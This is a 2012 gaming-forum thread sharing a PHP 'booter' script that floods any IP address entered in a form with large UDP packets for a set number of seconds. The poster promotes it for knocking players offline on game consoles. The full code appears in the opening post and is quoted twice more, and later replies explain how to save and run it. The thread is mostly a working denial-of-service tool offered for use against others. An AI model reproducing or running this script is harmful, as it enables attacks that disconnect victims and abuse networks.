Post: PHP UDP Flooder (Lag Switch)
09-15-2012, 12:46 AM #1
Red
Life In Technicolor
(adsbygoogle = window.adsbygoogle || []).push({}); I have no idea if this is already posted but here it is. This is also a 'Lag Switch' and can be used to kick people offline on Games Consoles, as long as you are host. :fa:

    
<html>
<head>
Hex Booter
<?php
$ip = $_SERVER['REMOTE_ADDR'];
?>
</head>
<body>
<center>
<font color="blue">
<pre>
_______(_ | o ,' `.
|:::::::::\ | : `--. \
|::::::::::| | (-) \ :
|::::::::::| | / @: |
|::::::::::| | `: : :
|::::::::::| | \- ;/
|::::::::::| | "---'=\
|::::::::::| | ___ / `.\
'-------,--'--.-' ____,:__/`-.:_,-* :'
-------'-------`---`-----' `-. _, |
--------------------------' `---" |
<center><b>Your IP:</b> <font color="blue"><?php echo $ip; ?></font> Don't Dos yourself<br><br></center>
</pre>
<STYLE>
input{
background-color: blue; font-size: 8pt; color: white; font-family: Tahoma; border: 1 solid #666666;
}
button{
background-color: #00FF00; font-size: 8pt; color: #000000; font-family: Tahoma; border: 1 solid #666666;
}
body {
background-color: #000000;
}
</style>
<?php
//UDP
if(isset($_GET['host'])&&isset($_GET['time'])){
$packets = 0;
ignore_user_abort(TRUE);
set_time_limit(0);

$exec_time = $_GET['time'];

$time = time();
//print "Started: ".time('d-m-y h:i:s'Winky Winky."<br>";
$max_time = $time+$exec_time;

$host = $_GET['host'];

for($i=0;$i<65000;$i++){
$out .= 'X';
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$rand = rand(1,65000);
$fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo "<br><b>UDP Flood</b><br>Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second \n";
echo '<br><br>
<form action="'.$surl.'" method=GET>
<input type="hidden" name="act" value="phptools">
IP: <br><input type=text name=host><br>
Length (seconds): <br><input type=text name=time><br>
<input type=submit value=Go></form>';
}else{ echo '<br><b>UDP Flood</b><br>
<form action=? method=GET>
<input type="hidden" name="act" value="phptools">
IP: <br><input type=text name=host value=><br>
Length (seconds): <br><input type=text name=time value=><br><br>
<input type=submit value=Go></form>';
}
?>
</center>
</body>
</html>


Enjoy. :fa:
(adsbygoogle = window.adsbygoogle || []).push({});
10-01-2012, 01:19 PM #2
Who coded this?
10-06-2012, 06:42 PM #3
Red
Life In Technicolor
Originally posted by Macadelic View Post
Who coded this?


No idea. :fa:
10-06-2012, 06:46 PM #4
xCes-
Banned
where do u put in the codes?
10-13-2012, 09:15 PM #5
Team_Specialist
Pokemon Trainer
thanks !!!
10-13-2012, 09:19 PM #6
Originally posted by Flash. View Post
I have no idea if this is already posted but here it is. This is also a 'Lag Switch' and can be used to kick people offline on Games Consoles, as long as you are host. :fa:

    
<html>
<head>
Hex Booter
<?php
$ip = $_SERVER['REMOTE_ADDR'];
?>
</head>
<body>
<center>
<font color="blue">
<pre>
_______(_ | o ,' `.
|:::::::::\ | : `--. \
|::::::::::| | (-) \ :
|::::::::::| | / @: |
|::::::::::| | `: : :
|::::::::::| | \- ;/
|::::::::::| | "---'=\
|::::::::::| | ___ / `.\
'-------,--'--.-' ____,:__/`-.:_,-* :'
-------'-------`---`-----' `-. _, |
--------------------------' `---" |
<center><b>Your IP:</b> <font color="blue"><?php echo $ip; ?></font> Don't Dos yourself<br><br></center>
</pre>
<STYLE>
input{
background-color: blue; font-size: 8pt; color: white; font-family: Tahoma; border: 1 solid #666666;
}
button{
background-color: #00FF00; font-size: 8pt; color: #000000; font-family: Tahoma; border: 1 solid #666666;
}
body {
background-color: #000000;
}
</style>
<?php
//UDP
if(isset($_GET['host'])&&isset($_GET['time'])){
$packets = 0;
ignore_user_abort(TRUE);
set_time_limit(0);

$exec_time = $_GET['time'];

$time = time();
//print "Started: ".time('d-m-y h:i:s'Winky Winky."<br>";
$max_time = $time+$exec_time;

$host = $_GET['host'];

for($i=0;$i<65000;$i++){
$out .= 'X';
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$rand = rand(1,65000);
$fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo "<br><b>UDP Flood</b><br>Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second \n";
echo '<br><br>
<form action="'.$surl.'" method=GET>
<input type="hidden" name="act" value="phptools">
IP: <br><input type=text name=host><br>
Length (seconds): <br><input type=text name=time><br>
<input type=submit value=Go></form>';
}else{ echo '<br><b>UDP Flood</b><br>
<form action=? method=GET>
<input type="hidden" name="act" value="phptools">
IP: <br><input type=text name=host value=><br>
Length (seconds): <br><input type=text name=time value=><br><br>
<input type=submit value=Go></form>';
}
?>
</center>
</body>
</html>


Enjoy. :fa:


how do u use this code?
10-13-2012, 09:25 PM #7
Originally posted by Flash. View Post
I have no idea if this is already posted but here it is. This is also a 'Lag Switch' and can be used to kick people offline on Games Consoles, as long as you are host. :fa:

    
<html>
<head>
Hex Booter
<?php
$ip = $_SERVER['REMOTE_ADDR'];
?>
</head>
<body>
<center>
<font color="blue">
<pre>
_______(_ | o ,' `.
|:::::::::\ | : `--. \
|::::::::::| | (-) \ :
|::::::::::| | / @: |
|::::::::::| | `: : :
|::::::::::| | \- ;/
|::::::::::| | "---'=\
|::::::::::| | ___ / `.\
'-------,--'--.-' ____,:__/`-.:_,-* :'
-------'-------`---`-----' `-. _, |
--------------------------' `---" |
<center><b>Your IP:</b> <font color="blue"><?php echo $ip; ?></font> Don't Dos yourself<br><br></center>
</pre>
<STYLE>
input{
background-color: blue; font-size: 8pt; color: white; font-family: Tahoma; border: 1 solid #666666;
}
button{
background-color: #00FF00; font-size: 8pt; color: #000000; font-family: Tahoma; border: 1 solid #666666;
}
body {
background-color: #000000;
}
</style>
<?php
//UDP
if(isset($_GET['host'])&&isset($_GET['time'])){
$packets = 0;
ignore_user_abort(TRUE);
set_time_limit(0);

$exec_time = $_GET['time'];

$time = time();
//print "Started: ".time('d-m-y h:i:s'Winky Winky."<br>";
$max_time = $time+$exec_time;

$host = $_GET['host'];

for($i=0;$i<65000;$i++){
$out .= 'X';
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$rand = rand(1,65000);
$fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo "<br><b>UDP Flood</b><br>Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second \n";
echo '<br><br>
<form action="'.$surl.'" method=GET>
<input type="hidden" name="act" value="phptools">
IP: <br><input type=text name=host><br>
Length (seconds): <br><input type=text name=time><br>
<input type=submit value=Go></form>';
}else{ echo '<br><b>UDP Flood</b><br>
<form action=? method=GET>
<input type="hidden" name="act" value="phptools">
IP: <br><input type=text name=host value=><br>
Length (seconds): <br><input type=text name=time value=><br><br>
<input type=submit value=Go></form>';
}
?>
</center>
</body>
</html>


Enjoy. :fa:

i know im stupid but i see html...so do we put it in notepad and save it as a html file?
10-14-2012, 11:44 AM #8
Red
Life In Technicolor
Originally posted by fluffyTHEnutsak View Post
i know im stupid but i see html...so do we put it in notepad and save it as a html file?


Yes, just put it in Notepad and Save it as .html then load it up, if that doesn't work, paste it into Notepad and save it as .php, then load it with the web browser.

The following user thanked Red for this useful post:

fluffyTHEnutsak
10-14-2012, 02:40 PM #9
cucufate
Save Point
virus.... please go troll to another site

The following user groaned cucufate for this awful post:

fluffyTHEnutsak
10-14-2012, 05:05 PM #10
Originally posted by brystn1 View Post
how do u use this code?

if you noticed it has the tag <html> so you would need to put it in a notepad and save as a .html or a .php

The following user thanked fluffyTHEnutsak for this useful post:

brystn1

Copyright © 2026, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo